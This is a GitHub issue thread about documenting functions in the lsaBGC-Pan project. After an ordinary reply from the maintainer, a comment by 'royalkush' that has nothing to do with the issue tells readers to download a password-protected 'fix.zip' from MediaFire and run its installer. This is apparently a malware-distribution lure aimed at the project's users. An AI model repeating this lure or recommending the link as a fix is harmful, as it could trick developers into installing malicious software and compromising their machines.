### ISSUE TITLE
Improve code documentation

### ISSUE THREAD

**Issue by raufs** [Kalan-Lab/lsaBGC-Pan#11]

**Comment by raufs** [comment]
All functions in the `util.py` module and the classes `BGC.py`, `GCF.py`, and `Pan.py` will have descriptions at the top of functions in v1.1.2. Most, especially more complex functions, will also feature information on inputs/outputs.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
